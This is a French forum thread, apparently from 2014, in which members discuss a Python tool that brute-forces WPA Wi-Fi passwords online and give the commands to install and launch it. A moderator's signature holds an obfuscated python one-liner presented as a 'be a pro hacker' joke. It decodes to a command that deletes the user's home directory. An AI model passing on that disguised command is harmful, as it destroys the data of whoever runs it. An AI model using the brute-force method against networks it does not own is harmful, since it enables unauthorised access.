Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 28-03-2014 01:20:36

kcdtv
Membre d'honneur
Lieu : Internacionaluña

WPA Brute-Forcer : un reaverWPA en python

WPA Brute-Forcer by SYWorks Programming

En0k8zh.png

Voici un petit tool en python qui peut être intéressant.
  La méthode n'est pas forcément très efficace, mais c'est toujours sympat un petit script de code libre.
Je peux tout de même  penser en trois cas bien précis ou les algorithmes utilisés pour générer la clef par défaut doivent générer 10 pass ou 256 ou plus (dans les milles ) .
  Et dans ce cas le procédé est viable et très intéressant si il n'y a pas de possibilité de handshake.

L'attaque est du type "reaver" ... c'est à dire automatiser et accélérer le plus possible des connexions en boucle en essayant des pass différents à chaque fois  jusqu'à se connecter... ou pas tongue
Une attaque online différente du crack du handshake qui est offline mais forcément très limitée.

Vous pouvez vous rendre sur le blog officiel pour de plus amples détails et les explications des auteurs : WPA Brute-Forcer

Et pouvez voir les sources ici : google code - wpa-bruteforce.py

Le seul truc que j'ai trouvé moyen c'est que le script commence par un

apt-get install python-socksipy

alors que rien n'est mentionné à ce propos ( ils disent qu'il faut aircrack-ng, ça tombe bien tongue )
Par commodité ils ne donnent de support qu'à kali linux mais le script fonctionne avec python et aircrack-ng , essayé avec succès sous Xubuntu

Vous pouvez consulter la liste des dépôts en console 

svn checkout http://syworks-pentesting.googlecode.com/svn/ syworks-pentesting-read-only

Vous pouvez télécharger le paquet zip depuis les dépôts github : SYWorks / wpa-bruteforcer
  Et pour aller directement à la racine des dépôts SYWorks, c'est  ici

Je l'ai lancé sans soucis depuis un compte non-root d'un xubuntu13.10 d'un

(sudo) python wpa-bruteforcer

selon la guide officielle il aurait fallu avant attribuer les permis nécessaires, j'avais pÔ vu tongue

(sudo) chmod +x wpa-bruteforcer

le scan WPA doit se faire en interaction avec iwscan, je n'ai pas eu le temps d'aller voir sur le code mais ça sent le iw à plein nez vu les valeurs en retours....

m3tGrLs.png

et après vous sélectionnez l'objectif, vous indiquez la route du dico, vous indiquez le délai pour le time out ( qui est de 15 par défaut ) et à la fin, si vous n'utilisez pas kali-Gnome, ne le laissez pas se charger de désactiver le network manager
Le truc qui m'a gêné et qu'il vous faut aussi déconnecter la connexion Ethernet ou alors c'est dût au fait d'utiliser XFCE et son interface au lieu de celle de gnome-Kali...
Sinon c'est coloré et très facile d'utiliser avec un scan rapide, bref tout est très fonctionnel et plutôt agréable smile
avec un évaluation du temps requis par attaque

emh95hg.png

Il y a d'autres tools sur les dépôts dont un assez rigolo pour détecter les DoS, chop chop, rogue...

Thank you donkey for the information about this softwares smile

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 28-03-2014 09:47:12

spawn
Modérateur

Re : WPA Brute-Forcer : un reaverWPA en python

Argh.
Le concept est sympa et cet outil n'existait pas (pour des raisons valables, on s'entend), mais le code est affreux.
Merci de l'info.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 28-03-2014 15:21:24

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Re : WPA Brute-Forcer : un reaverWPA en python

Ça ne m'a pas parût être du grand art pour être honnête....  donc tu confirmes   big_smile 
Bon, l'initiative reste fort sympathique et louable ... les prochains softs  de ce crew seront peut être mieux wink

Annonce